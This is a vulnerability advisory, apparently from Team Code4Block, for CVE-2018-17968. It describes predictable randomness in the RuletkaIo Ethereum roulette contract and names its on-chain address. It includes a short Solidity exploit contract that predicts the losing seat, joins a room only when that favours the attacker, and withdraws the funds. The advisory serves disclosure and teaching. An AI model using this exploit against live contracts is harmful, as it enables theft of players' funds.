CVE-2018-17968
Vendor
RuletkaIo
Vulnerability Type
Bad Randomness
Abstract
A gambling smart contract implementation for RuletkaIo, an Ethereum gambling game, generates a random value that is predictable by an external contract call. The developer wrote a random() function that uses a block timestamp and block hash from the Ethereum blockchain. This can be predicted by writing the same random function code in an exploit contract to determine the deadSeat value.
Details
It is a roulette game. A total of six people can enter the room. When six people give a bet and the room gets full, the contract executes "executeRoom" function and "random()" function and store it in a variable called "deadSeat". Then, it runs the distributeFunds function with "deadSeat" variable as the argument, and give the winning prizes to people whose number is not "deadSeat". However, if the attacker look at the "random()" function, it uses blockhash and block timestamp, which can be calculated by an external contract (Line 177). This ensures that the "deadSeat" value is always known and allows attacker to always won.
Exploit
contract attack{
function attack(address _target, uint256 roomId, uint256 s_idx, uint256 amount) public payable{
address[] players;
uint256 entryPrice;
RuletkaIo target = RuletkaIo(_target);
uint256 rand = uint256(uint256(keccak256(block.timestamp, block.difficulty)))%6;
if(rand < s_idx){
for(uint256 i = s_idx; i<6; i++){
target.enter.value(amount)(roomId);
}
}
msg.sender.transfer(this.balance);
}
}
Conclusion
It is hard to make secure random number in solidity. Check out other "Bad Randomness" CVE in our https://github.com/TEAM-C4B/CVE-LIST.
Reference
Official Website https://www.ruletka.io/
Dappradar https://dappradar.com/app/808/ruletka
Explorer https://etherscan.io/address/0xef02c45c5913629dd12e7a9446455049775eec32
Code https://etherscan.io/address/0xef02c45c5913629dd12e7a9446455049775eec32#code
Discoverer
Team Code4Block